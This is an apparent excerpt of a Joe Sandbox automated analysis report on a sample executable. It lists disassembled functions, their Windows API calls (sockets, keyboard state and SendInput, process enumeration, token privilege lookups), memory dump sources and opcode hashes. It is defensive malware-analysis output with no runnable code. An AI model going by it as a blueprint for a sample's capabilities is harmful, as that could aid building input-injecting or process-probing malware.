                                                                                                                      • __itow.LIBCMT ref: 00519BC3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3379773720-0
                                                                                                                      • Opcode ID: 0969af0c51dcd840e5ab856d1e3cd86cd058a00a27770c7ced4b6b70dfae1f5b
                                                                                                                      • Instruction ID: 3371cb922fb5fa7d50b7fbeee6bdf892c01dd74b84768021bd182032ca4de156
                                                                                                                      • Opcode Fuzzy Hash: 0969af0c51dcd840e5ab856d1e3cd86cd058a00a27770c7ced4b6b70dfae1f5b
                                                                                                                      • Instruction Fuzzy Hash: 6241AD74A04209ABEF11EF15D855FEE7FB9EF48724F00006EF905A3291DB749A84CBA1
                                                                                                                      Function 005369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 005369D1
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005369E1
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00536A45
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00536A51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2214342067-0
                                                                                                                      • Opcode ID: 58d1f200f38b53b689af5b15c3e8ec2bb0b130698b29c13e6b2949081a714d5c
                                                                                                                      • Instruction ID: 08cde0aaa574ef8b8ea544c0464f0497a7d17cc9945c1f26691942cb4a41c0e6
                                                                                                                      • Opcode Fuzzy Hash: 58d1f200f38b53b689af5b15c3e8ec2bb0b130698b29c13e6b2949081a714d5c
                                                                                                                      • Instruction Fuzzy Hash: 8641C339740200BFEB90BF25CC8AF6A77A4EB45B18F04C41DFA199F2C2DA749D008755
                                                                                                                      Function 0053641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0054F910), ref: 005364A7
                                                                                                                      • _strlen.LIBCMT ref: 005364D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4218353326-0
                                                                                                                      • Opcode ID: 16e59f230e74d15113e1e1aacd57cc062461dca509648a8a1001f9f9789c4795
                                                                                                                      • Instruction ID: aff5bad1b1a65871d7590658159658a11f710d8de5a9fc66e4a93f2b9819ad3c
                                                                                                                      • Opcode Fuzzy Hash: 16e59f230e74d15113e1e1aacd57cc062461dca509648a8a1001f9f9789c4795
                                                                                                                      • Instruction Fuzzy Hash: 4741F635900104BBCB14EBA9DC89FAEBBA9BF44314F50816EF91697292EB34AD40CB54
                                                                                                                      Function 0052B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0052B89E
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0052B8C4
                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0052B8E9
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0052B915
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: c30f11a9454e3587f6acb33b654d1676d7baa7095d110099430c46d59ede24a0
                                                                                                                      • Instruction ID: cd5c6ac57b6e2cab9bafece2405c0fa551803d58892c80460cace33ac7290f27
                                                                                                                      • Opcode Fuzzy Hash: c30f11a9454e3587f6acb33b654d1676d7baa7095d110099430c46d59ede24a0
                                                                                                                      • Instruction Fuzzy Hash: 3F412939600510EFCB50EF15C488A59BBE1BF4A718F09809DEC4A9B362CB34FD45DB95
                                                                                                                      Function 00548851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005488DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 8bb0a21dd803ee30259940d9cea2e2da5737653059a45d3aedc171f68a5da8b7
                                                                                                                      • Instruction ID: 91f1f2147d9b828f86c95c3a5adcc7cfb7d1378685dd99d32be22c9cfd357130
                                                                                                                      • Opcode Fuzzy Hash: 8bb0a21dd803ee30259940d9cea2e2da5737653059a45d3aedc171f68a5da8b7
                                                                                                                      • Instruction Fuzzy Hash: 5731E438600909BFEF249B58CC45FFC7FA5FB06358F944912FA15E61A1CE70E9809B52
                                                                                                                      Function 0054AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054AB60
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0054ABD6
                                                                                                                      • PtInRect.USER32(?,?,0054C014), ref: 0054ABE6
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0054AC57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: 70f3ada7bec7b108aee8b201b05083c33df9fd65e59283a886470dc16bce0ad8
                                                                                                                      • Instruction ID: 10e340fc014c975575d8efdcb34d72ecf62c519c66a85d647ee3a679d6d25252
                                                                                                                      • Opcode Fuzzy Hash: 70f3ada7bec7b108aee8b201b05083c33df9fd65e59283a886470dc16bce0ad8
                                                                                                                      • Instruction Fuzzy Hash: B7418A35A401199FCB95DF58C8C4AE97BF5FB99308F2884A9F8149F260E730AC45DF92
                                                                                                                      Function 00520AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00520B27
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00520B43
                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00520BA9
                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00520BFB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: ac3acf2cd6ba38af4dfabf179606953981ca50edd836a0a5eb5cd48ca2599742
                                                                                                                      • Instruction ID: 41dde168ae51feae80a2c555e6a0ef4bec04fbfc1ae2dd1307e6859d6e45dd85
                                                                                                                      • Opcode Fuzzy Hash: ac3acf2cd6ba38af4dfabf179606953981ca50edd836a0a5eb5cd48ca2599742
                                                                                                                      • Instruction Fuzzy Hash: BE314870D45228AEFF308B29AC09BFEBFA5BF47318F04525AE490521D2C3748D859B61
                                                                                                                      Function 00520C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00520C66
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00520C82
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00520CE1
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00520D33
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 32129ba4a49026d3210bf9540579c55fcfcf27c5f1a56102e373d8044498b99b
                                                                                                                      • Instruction ID: 7ac054e79a2c260d0d75cbaeedfefc3310e9b0d1caff58d8f5adfbe824c04fe1
                                                                                                                      • Opcode Fuzzy Hash: 32129ba4a49026d3210bf9540579c55fcfcf27c5f1a56102e373d8044498b99b
                                                                                                                      • Instruction Fuzzy Hash: C8315A709422286EFF348B69AC097FEFF66BF87310F04571AE480621D2C3759D4597A1
                                                                                                                      Function 004F61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004F61FB
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 004F6229
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004F6257
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004F628D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: c54a7cac2b3f5c9879f9d094d183035a4b05ea5c37dde3fb706be3365955808c
                                                                                                                      • Instruction ID: eb9464c781a3868ca76acfc3f434a21169d6fbd2568e271cefac29c5aae9905d
                                                                                                                      • Opcode Fuzzy Hash: c54a7cac2b3f5c9879f9d094d183035a4b05ea5c37dde3fb706be3365955808c
                                                                                                                      • Instruction Fuzzy Hash: 8631F03060024AAFDF219F65CC44BBB7BB9FF42310F1740AAE924872A1DB35E950DB94
                                                                                                                      Function 00544EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 00544F02
                                                                                                                        • Part of subcall function 00523641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0052365B
                                                                                                                        • Part of subcall function 00523641: GetCurrentThreadId.KERNEL32 ref: 00523662
                                                                                                                        • Part of subcall function 00523641: AttachThreadInput.USER32(00000000,?,00525005), ref: 00523669
                                                                                                                      • GetCaretPos.USER32(?), ref: 00544F13
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00544F4E
                                                                                                                      • GetForegroundWindow.USER32 ref: 00544F54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: e421803582a9da2f95a17a866a247cd137496fc0a8af505d2523be975ed42abc
                                                                                                                      • Instruction ID: f5bf9a81bcde7f1ab1949a36613658dfd2ec3a994391b0d816d44573f8c8adfa
                                                                                                                      • Opcode Fuzzy Hash: e421803582a9da2f95a17a866a247cd137496fc0a8af505d2523be975ed42abc
                                                                                                                      • Instruction Fuzzy Hash: 64312E75D00108AFDB00EFA6C885EEFB7F9EF95304F10446AE415E7241DA759E058BA4
                                                                                                                      Function 00523C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00523C7A
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00523C88
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00523CA8
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00523D52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: 7b3791877ee49fc00a7f8d0465d38c6c81e31538d1b37936bea3a24436c224b4
                                                                                                                      • Instruction ID: bfd05a80285150cd4d2e1b3f224e4c8f4054f9cef9b9757378d978ad35be5029
                                                                                                                      • Opcode Fuzzy Hash: 7b3791877ee49fc00a7f8d0465d38c6c81e31538d1b37936bea3a24436c224b4
                                                                                                                      • Instruction Fuzzy Hash: CC31C4751083059FD300EF55D881FAFBBE8FF96358F50082DF581861A1EB75AA49CB52
                                                                                                                      Function 0054C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054C4D2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004FB9AB,?,?,?,?,?), ref: 0054C4E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054C534
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004FB9AB,?,?,?), ref: 0054C56E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: 7a027ade85c885a79136f9039044c5dd8698493e6d216654292b5da99a0c24a3
                                                                                                                      • Instruction ID: a4fb183bfc23d2e285b149a0205e761faa11c0e397dd97536d73d563d884f977
                                                                                                                      • Opcode Fuzzy Hash: 7a027ade85c885a79136f9039044c5dd8698493e6d216654292b5da99a0c24a3
                                                                                                                      • Instruction Fuzzy Hash: 6D319E39601018AFCB658F58C898EEE7FB5FB4A354F444069F9059B261C731AD50EFA4
                                                                                                                      Function 00518656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00518121
                                                                                                                        • Part of subcall function 0051810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0051812B
                                                                                                                        • Part of subcall function 0051810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0051813A
                                                                                                                        • Part of subcall function 0051810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00518141
                                                                                                                        • Part of subcall function 0051810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00518157
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005186A3
                                                                                                                      • _memcmp.LIBCMT ref: 005186C6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005186FC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00518703
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 87f6f1b4df6c697e7f20e6442b28cb6590d2137cfba95a46b6263c7ea6bd0d78
                                                                                                                      • Instruction ID: 127cfb0b3fd5fdd42ea809099ab500159f64849eff7c83f995f5db76b8971e97
                                                                                                                      • Opcode Fuzzy Hash: 87f6f1b4df6c697e7f20e6442b28cb6590d2137cfba95a46b6263c7ea6bd0d78
                                                                                                                      • Instruction Fuzzy Hash: C5217A31E40108EBEB20DFA8C948BFEBBB8FF51308F144059E444AB241DB35AE45CB50
                                                                                                                      Function 004E098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 004E09AE
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
                                                                                                                      • _fprintf.LIBCMT ref: 004E09E5
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00515DBB
                                                                                                                        • Part of subcall function 004E4AAA: _flsall.LIBCMT ref: 004E4AC3
                                                                                                                      • __setmode.LIBCMT ref: 004E0A1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 1c19ee57d403acba0858323f38591a736cc2ffbb6af11325e035ead7f01c6742
                                                                                                                      • Instruction ID: c2f3c5c3b0312db85cda506529e76c71c1d97bd54c684a9473d956bd34d31c0f
